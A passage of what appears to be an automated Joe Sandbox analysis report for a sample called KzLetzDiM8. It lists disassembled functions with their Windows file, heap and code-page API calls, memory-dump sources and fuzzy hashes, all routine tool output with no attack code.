                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: daeb6114b3949dced051f5e968a7ea8226583c0f22927a2d4e9c76e8cd388c37
                                                            • Instruction ID: eeeed3d57211600d882393d7544993d8554b587e25a5cec152a9592ecd0f8c92
                                                            • Opcode Fuzzy Hash: daeb6114b3949dced051f5e968a7ea8226583c0f22927a2d4e9c76e8cd388c37
                                                            • Instruction Fuzzy Hash: 2B31C731204785AFDB14CF21D818BBE7BA5FF94715F04461DF94197290CB75AD48CBA2
                                                            Function 001EA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001EC27E: _wcslen.LIBCMT ref: 001EC284
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA2D9
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA30C
                                                            • GetLastError.KERNEL32(?,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA329
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: 348a6a252963e3921e5ecbc103d5c60c2623e2d6398bcb038c26fe7e14515a14
                                                            • Instruction ID: 52e9e52d2358e583119420632e89d2acd0150142994ddf6a5c02f5b7d747451d
                                                            • Opcode Fuzzy Hash: 348a6a252963e3921e5ecbc103d5c60c2623e2d6398bcb038c26fe7e14515a14
                                                            • Instruction Fuzzy Hash: CA01FC35100A94AAEF21EB775C49BFD3399BF1D780F848414FA01E6091DB64EA81C6B3
                                                            Function 0020B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0020B8B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: 06818ba7139ea061024d8f26fd12c1284c01d576ab25b4ffcf92112e616fe1f7
                                                            • Instruction ID: fee6f9507618c2f118e6e163ef61b3eaff7854fac9fbe45d9f735d59580c9023
                                                            • Opcode Fuzzy Hash: 06818ba7139ea061024d8f26fd12c1284c01d576ab25b4ffcf92112e616fe1f7
                                                            • Instruction Fuzzy Hash: EB41F97051434C9EDF328E248C84BF6BBBDDB55304F1404EDE69A86183D375AA55CF60
                                                            Function 0020AC98 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0020ACF8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: @
                                                            • API String ID: 190572456-791083857
                                                            • Opcode ID: 436047b8520f429f1d3e1e1955d750dfd49cf1f1d46e6c7ad4d8a20119a17e95
                                                            • Instruction ID: 62b607c35b01ca85ccff211584d44d019486f8c294a089867562ab6dbaa23b9a
                                                            • Opcode Fuzzy Hash: 436047b8520f429f1d3e1e1955d750dfd49cf1f1d46e6c7ad4d8a20119a17e95
                                                            • Instruction Fuzzy Hash: E1110A33A203266FEF25DE18EC4499A7396ABC432075B8121FC15AB2D6DB30DC1187D2
                                                            Function 0020AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0020AFDD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: 9ad35e4fbf1ef0cd810e478ba02f5833bcf8860de9c72ddbadea5d3d1804ada3
                                                            • Instruction ID: d884079be85cb1d8cf16b76e83545aa38cfa3ca02c543c00fb7cc1711197b150
                                                            • Opcode Fuzzy Hash: 9ad35e4fbf1ef0cd810e478ba02f5833bcf8860de9c72ddbadea5d3d1804ada3
                                                            • Instruction Fuzzy Hash: B601293251420EBBCF02AF90DC09DEE7FA2EF59750F458154FE14261A1CA728971AB81
                                                            Function 0020AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0020A56F), ref: 0020AF55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: 48bda4f7de83db3de7f02fbec33c396a5a6c83c1a2c062fb8794d21ee676035f
                                                            • Instruction ID: 163d25aa103fd1cf2d8df62fde5e66a1380ed4dd8448a2799ba1a832e456a786
                                                            • Opcode Fuzzy Hash: 48bda4f7de83db3de7f02fbec33c396a5a6c83c1a2c062fb8794d21ee676035f
                                                            • Instruction Fuzzy Hash: 06F0B43169530CBBCF119F50DC0ADEDBFA1EF65711B418055FD089A2A0DE724E219B85
                                                            Function 0020ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            • Opcode ID: 7a289ade327212804ebe9c038c6ab498e8ecbc60f7fec95a9180eb53445e15a2
                                                            • Instruction ID: 43566d264c0329203139e928e6329966ff7417bec9f0bcb112ace7c0957b5c90
                                                            • Opcode Fuzzy Hash: 7a289ade327212804ebe9c038c6ab498e8ecbc60f7fec95a9180eb53445e15a2
                                                            • Instruction Fuzzy Hash: 52E0AB3069031C7BC700EB24EC0ADEEBBA4DFB5720B4100A9FC0597280CEB04E6186C6
                                                            Function 001FEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FEAF9
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: 3Ro
                                                            • API String ID: 1269201914-1492261280
                                                            • Opcode ID: a526acc37f9620f624ce833687064d0e9bdaa2c604ea8612a125467a428a98a9
                                                            • Instruction ID: 397447331e8608de0edbb41ac9d9c2983e9578c538d01bdcf607fd4d291e7d2f
                                                            • Opcode Fuzzy Hash: a526acc37f9620f624ce833687064d0e9bdaa2c604ea8612a125467a428a98a9
                                                            • Instruction Fuzzy Hash: B9B012CA2FE1CA7C320CB2405D02C37018CC1E1BE0330912FF601C40E5DEC00C520431
                                                            Function 0020BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0020B7BB: GetOEMCP.KERNEL32(00000000,?,?,0020BA44,?), ref: 0020B7E6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0020BA89,?,00000000), ref: 0020BC64
                                                            • GetCPInfo.KERNEL32(00000000,0020BA89,?,?,?,0020BA89,?,00000000), ref: 0020BC77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: 3cb5b952e1ad22b1a8449aa5ad879396b061d5b7ed0786e104a14d68c5e81bfd
                                                            • Instruction ID: c4e82c6900d6206abcb0b248888cfa7ef9083da59d992d8a0f9a9c0299eaa6b2
                                                            • Opcode Fuzzy Hash: 3cb5b952e1ad22b1a8449aa5ad879396b061d5b7ed0786e104a14d68c5e81bfd
                                                            • Instruction Fuzzy Hash: 6A513370D203469EEB368F31C885ABAFBE5EF51300F18446ED4968B2E3D7749956CB90
                                                            Function 001E9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,001E9A50,?,?,00000000,?,?,001E8CBC,?), ref: 001E9BAB
                                                            • GetLastError.KERNEL32(?,00000000,001E8411,-00009570,00000000,000007F3), ref: 001E9BB6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: bd6603beb505b10864c5577e38b77c16cc6edca2b2eb58ce61f715af7eb94711
                                                            • Instruction ID: e2fe6a737aad28ec6e71fdea509ce5c6c421dbb6560a7e61c35894301cb13c55
                                                            • Opcode Fuzzy Hash: bd6603beb505b10864c5577e38b77c16cc6edca2b2eb58ce61f715af7eb94711
                                                            • Instruction Fuzzy Hash: 4941AF71604B81CFDB24DF16E5848AEB7E6FFE4310F198A2DE89183261D7B0AD448A91
                                                            Function 001E1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E1E55
                                                              • Part of subcall function 001E3BBA: __EH_prolog.LIBCMT ref: 001E3BBF
                                                            • _wcslen.LIBCMT ref: 001E1EFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: a6c338856549e278a8b9947bc89764b94b628598ad374ad7aaee72916170e699
                                                            • Instruction ID: d27a6b6977fff8a908140b45690c44e9cb18939db15925317d3ab45e3e06539b
                                                            • Opcode Fuzzy Hash: a6c338856549e278a8b9947bc89764b94b628598ad374ad7aaee72916170e699
                                                            • Instruction Fuzzy Hash: 39313A71904649AFCF15DF99C945AEEBBF6BF58300F100069F845A7251CB325E55CB60
                                                            Function 001E9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001E73BC,?,?,?,00000000), ref: 001E9DBC
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 001E9E70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: 3cbce4a1c19920adaa8a5d75739e42231529ef6aa73ace12df4336b720dc1560
                                                            • Instruction ID: aef7046cfada69f5015aad0471d53dd1960ad0bdd062a32376d1d456cd9d9d1d
                                                            • Opcode Fuzzy Hash: 3cbce4a1c19920adaa8a5d75739e42231529ef6aa73ace12df4336b720dc1560
                                                            • Instruction Fuzzy Hash: 3521D032248695EFC714DF76C891AABBBE4BF95304F08491CF8C587141D329E90C9B61
                                                            Function 001E966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,001E9F27,?,?,001E771A), ref: 001E96E6
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,001E9F27,?,?,001E771A), ref: 001E9716
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 6dad84ae9ade63569f79049d00dcc0374c8b853707a7244f253ba3fa2be032b0
                                                            • Instruction ID: 784602eb0407879dd8a6b41eab14e6bd5816cde18c8e044389d6bdab858d0894
                                                            • Opcode Fuzzy Hash: 6dad84ae9ade63569f79049d00dcc0374c8b853707a7244f253ba3fa2be032b0
                                                            • Instruction Fuzzy Hash: EC21C1B1504B846FE3309A66CC89BFB77ECEB5D324F044A19FA95C21D1C774A8848A71
                                                            Function 001E9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 001E9EC7
                                                            • GetLastError.KERNEL32 ref: 001E9ED4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 2b720a58990b15c1f99e206575dcfd472f95614204cb7ba12f31a07804306d40
                                                            • Instruction ID: 87b004f7c89c10d5bc5688dfb5fa5c6fcde3a9c5591f0ff39d17fa91564e710d
                                                            • Opcode Fuzzy Hash: 2b720a58990b15c1f99e206575dcfd472f95614204cb7ba12f31a07804306d40
                                                            • Instruction Fuzzy Hash: BD112B31600B40EBD734C67ACC44BAEB7E9AB54370F504A29E653D26D0D7B0ED45C760
                                                            Function 00208E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00208E75
                                                              • Part of subcall function 00208E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00204286,?,0000015D,?,?,?,?,00205762,000000FF,00000000,?,?), ref: 00208E38
                                                            • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,00221098,001E17CE,?,?,00000007,?,?,?,001E13D6,?,00000000), ref: 00208EB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap$_free
                                                            • String ID:
                                                            • API String ID: 1482568997-0
                                                            • Opcode ID: cfde379571565353c03f5be97e67e8ef237c177b78452d426eae9bd71620cb7b
                                                            • Instruction ID: 530a34ea5939634317d201f75293ef86ce9a72d7dcdc6159bda01176df3848f7
                                                            • Opcode Fuzzy Hash: cfde379571565353c03f5be97e67e8ef237c177b78452d426eae9bd71620cb7b
                                                            • Instruction Fuzzy Hash: EAF0C232631303A6DB212E25EC04B6F37688F91B70F244126F9D8A61D3DF70DD3089A0
                                                            Function 001F109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 001F10AB
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 001F10B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: b7b6027f8c394476282d46e17d51f8e439916553e6f022ac9861f802ace2adbc
                                                            • Instruction ID: b74c83ba2e2068864f869f3a342a969661fc64699941f59a56a125bcd24d68d7
                                                            • Opcode Fuzzy Hash: b7b6027f8c394476282d46e17d51f8e439916553e6f022ac9861f802ace2adbc
                                                            • Instruction Fuzzy Hash: 40E06522A00649F7CF09CAA4AC198FB72EEAA582443248179A603E3101EE30EE414AA0
                                                            Function 001EA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001EA325,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA501
                                                              • Part of subcall function 001EBB03: _wcslen.LIBCMT ref: 001EBB27
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001EA325,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA532
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
